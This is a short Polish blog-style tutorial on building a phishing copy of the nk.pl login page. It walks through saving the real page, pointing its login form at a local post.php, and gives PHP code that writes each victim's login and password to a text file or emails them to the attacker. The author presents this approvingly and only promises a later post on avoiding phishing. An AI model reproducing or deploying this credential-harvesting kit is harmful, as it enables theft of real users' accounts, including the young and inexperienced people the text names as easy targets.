Phishing nk.pl

O tym jak stworzyć fejk stronę, która zapisuje nam dane użyte do zalogowania np. na nk.


Pewnie wiele razy natknęliście się na strony, które oferują darmowe profity - np. darmowe premium do gier sieciowych. Jak można zauważyć strony tego typu wymagają "zalogowania" się na stronie. Oczywiście dla osoby, która nie jest obeznana lub po prostu młoda, taka strona nie wzbudza podejrzeń. Strony te są łudząco podobne do oryginału, więc może się wydawać, że logujemy się na tej "prawdziwej".

Powiedzmy, że się podamy swój login i hasło by dostać darmowe konto premium. Po wpisaniu danych na fake stronie zazwyczaj pokazuje się napis typu "Wpisane dane są nieprawidłowe" - guzik prawda. Twoje dane zostały najprawdopodobniej zapisane i czekają na odczyt przez oszusta, który najprawdopodobniej zawłaszczy sobie twoje konto. :)

Postaram w krótki sposób przedstawić jak powstaje fake strona:
1. Po pierwsze obierz stronę, której chcesz stworzyć fake`a. W moim przypadku będzie to nk.pl.
2. Wejdź na stronę i z menu przeglądarki wybierz 'zapisz stronę'.
3. Otwórz zapisaną stronę główną (np.index.html, main.html) za pomocą notatnika.
4. W otworzonym pliku wyszukaj "action" (formularz, przez który dane są przesyłane).
5. Zmień 'action="https://nk.pl" method="POST"' na 'action="post.php" method="POST".
6. Stwórz plik post.php.
7. Wpisz do post.php:
- by dane zapisały się w pliku txt:

$dane = $_POST['login']." ". $_POST['password']."\r\n";
$plik = "nazwa_pliku.txt";
$uchwyt = fopen($plik, a);
flock($uchwyt, 2);
fwrite($uchwyt, $dane);
flock($uchwyt, 3);
fclose($uchwyt);

- by dane zostały wysłane na emaila:

$tresc = $_POST['login']." ".$_POST['password'];
mail('Twójemail', 'Temat',$tresc ,  
'From: nadawca\r\n
Reply-To: adresat\r\n');

8. Zapisz i dodaj coś co spotęguje wiarygodność fake :)

To tyle, mówiłem, że będzie krótko.
Za niedługo opublikuję posta jak nie dać się nabrać na wszelkiego rodzaju phishing.